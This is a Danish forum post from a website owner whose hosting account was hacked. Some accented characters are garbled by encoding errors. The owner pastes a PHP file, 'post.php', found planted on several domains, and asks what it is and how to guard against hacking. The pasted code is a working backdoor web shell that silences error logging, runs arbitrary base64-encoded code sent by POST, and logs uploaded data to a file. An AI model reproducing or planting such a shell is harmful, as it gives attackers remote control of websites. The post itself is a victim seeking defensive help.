N�r ens webhotel bliver hacket?

Thu, 03 Apr 2014 09:01:22 GMT

Jeg har tidligere i �r oplevet at �t af mine dom�ner var blevet hacket.
Det var en hjemmeside som faktisk var mere eller mindre tom, da den "kun" virkede som "henvisningsside".
L�sningen var jo derfor enkel, alt blev slettet, FTP password osv. skiftet og problemer var l�st.

M�ske!
For i dag har jeg f�et besked om at noget kunne tyde p� at der alligevel ikke blev renset helt ud g at det m�ske er mere end et enkelt dom�ne som er p�virket.
�v. S� er der jo ikke andet at g�re end at f� det hele g�et igennem endnu engang.

Jeg har fundet en fil som hedder "post.php". Denne er IKKE en som jeg selv har uploadet og eg aner ikke hvor den kommer fra, s� jeg har selvf�lgelig slettet den fra serveren. Fandt den under hvert af de dom�ner som mist�nkes at v�re "ramt".

Er der nogen der kan se ud fra koden, hvad det er for en type?

Kode

<?php

@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
@ini_set("memory_limit", "128M");
@ini_set("max_execution_time",30);
@set_time_limit(30); 

if (isset($_SERVER["HTTP_X_REAL_IP"])) $_SERVER["REMOTE_ADDR"] = $_SERVER["HTTP_X_REAL_IP"];

if (isset($_POST["code"]))
{
	eval(base64_decode($_POST["code"]));
}

elseif (isset($_SERVER["HTTP_CONTENT_ENCODING"]) && $_SERVER["HTTP_CONTENT_ENCODING"] == "binary")
{
	$input = file_get_contents("php://input");

	if (strlen($input) > 0) print "STATUS-IMPORT-OK";

	if (strlen($input) > 10)
	{
		$fp = @fopen(str_replace(".php",".bin",basename($_SERVER["SCRIPT_FILENAME"])), "a");
		@flock($fp, LOCK_EX);
		@fputs($fp, $_SERVER["REMOTE_ADDR"]."\t".base64_encode($input)."\r\n");
		@flock($fp, LOCK_UN);
		@fclose($fp);
	}
}

elseif (strpos($_SERVER["REQUEST_URI"], ".shtml") !== false)
{
	print $_SERVER["REQUEST_URI"];
}


exit;

?>

Og er der ellers nogen som kunne have nogle god forslag til hvordan man sikre sig bedst muligt mod at blive hacket?

Udvikleren.dk - Seneste [hacket] forum tr�de

N�r ens webhotel bliver hacket?